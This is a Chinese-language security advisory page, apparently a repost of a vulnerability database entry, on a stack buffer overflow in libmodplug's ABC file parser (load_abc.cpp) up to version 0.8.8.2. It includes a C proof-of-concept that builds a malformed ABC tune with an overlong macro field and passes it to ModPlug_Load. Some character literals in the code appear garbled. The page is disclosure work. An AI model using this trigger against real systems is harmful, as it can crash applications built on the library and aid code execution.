Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / libmodplug “load_abc.cpp”远程栈缓冲区溢出漏洞

发布日期:2011-04-28
更新日期:2011-05-04受影响系统:
libmodplug libmodplug 0.8.8 2
libmodplug libmodplug 0.8.8 1
libmodplug libmodplug 0.8.7
libmodplug libmodplug 0.8.7
libmodplug libmodplug 0.8.6
libmodplug libmodplug 0.8.4
libmodplug libmodplug 0.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47624Libmodplug是用于播放mod类音乐格式的开源函数库。libmodplug "load_abc.cpp"在实现上存在远程栈缓冲区溢出漏洞,远程攻击者可利用此漏洞以使用受影响库的应用程序用户权限执行任意代码,造成拒绝服务。此漏洞源于src/load_abc.cpp "abc_new_macro()"和"abc_new_umacro()"函数中的边界错误,通过诱使用户打开特制的ABC文件造成栈缓冲区溢出。<*来源:epiphant
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!epiphant ()提供了如下测试方法:#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow pochttp://modplug-xmms.sourceforge.net/by: epiphantthis exploits one of many overflows in load_abc.cpp lolvlc media player uses libmodpluggreets: defrost, babi, ming_wisher, emel1a, a.v., krsdate: 28 april 2011tested on: CentOS 5.6
*/int main(void)
{
  char test[512] = "X: 1 U: ";
  unsigned int i;  i = strlen(test);
  while (i < 278)
    test[i++] = "Q";
  test[i++] = "1" + 32;
  test[i++] = "3";
  test[i++] = "3";
  test[i++] = "4";
  while (i < 286)
    test[i++] = "A";
  test[i++] = " ";
  test[i] = "";  strcat(test, "T: Here Without You (Transcribed by: Bungee) ");
  strcat(test, "Z: 3 Doors Down ");
  strcat(test, "L: 1/4 ");
  strcat(test, "Q: 108 ");
  strcat(test, "K: C ");
  strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8] ");  i = strlen(test);
  ModPlug_Load(test, i);  return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:libmodplug
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://modplug-xmms.sourceforge.net/Perl lc/lcfirst/uc和ucfirst函数安全漏洞XML Security Library “xslt.c”任意文件访问漏洞相关资讯      漏洞  Libmodplug 
  • 快递官网漏洞泄露 1400 万用户信息  (08/12/2014 08:37:42)
  • 软件漏洞是一笔大买卖!  (10/06/2012 08:28:32)
  • PHPCMS V9.1.13任意文件包含漏洞分  (08/01/2012 07:23:17)
  • libmodplug ABC文件解析漏洞  (08/12/2013 14:13:06)
  • 要389目录服务器访问绕过漏洞  (10/01/2012 09:18:08)
  • ASUS Net4Switch "ipswcom.dll"   (03/02/2012 09:32:42)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图